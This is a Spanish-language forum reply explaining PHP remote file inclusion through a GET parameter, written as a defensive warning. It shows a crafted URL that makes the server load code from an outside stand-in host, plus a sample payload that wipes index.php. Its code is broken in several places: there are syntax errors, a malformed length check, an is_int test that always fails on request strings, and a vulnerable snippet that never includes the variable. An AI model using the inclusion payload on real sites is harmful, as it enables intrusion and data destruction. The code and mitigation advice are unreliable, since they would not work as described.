luks77:
Talvez un ejemplo simple te puede ayudar.
Suponemos que register_globals() esta en OFF!!!.
1.- Supongamos que tus usuarios pueden bajar
imagenes basado en enlaces asi ->
http://tusitio.com/archivos/index.php?uno=1234567890
La variable en este caso es "uno" y su valor es "1234567890"
2.- Tus usuarios recibiran un enlace con cualquier combinacion
de numeros que contengan 10 numeros o menos.
3.- Tu la recibes desde el archivo
index.php asi->
$variable = $_GET[uno'];
aqui sigue el codigo de tu archivo...
4.- Que puede hacer un atacante:
Puede enviar o solicitar algo asi ->
tusitio.com/archivos/index.php?uno=http://otrositio.com/archivos/hack.txt
Que sucedio ->
Ya el atacante pudo ejecutar tu codigo dentro del servidor y probablemente
el archivo hack.txt contenga codigo como
$x = "index.php"
if(file_exists, $x) {
$apertura = fopen("$x", "w");
fclose($apertura);
exit();
}
Ya qui tu atacante dejo con 0 bytes tu index.php
y quedastes hackeado.
5.- Que hacer --->
Asegurate que la variable "uno" sea lo que esperas que sea y nada mas
como ->
if(strlen($variable > "10")) { exit(); }
if(is_int($variable)) {
Aqui pones el resto del codigo....
} else {
exit();
}
Cosas como estas debes hacer!!!!.

Saludos
Y espero te ayude
Franco

P.S. Si la variable fuera para bases de datos la situacion se complica aun mas!.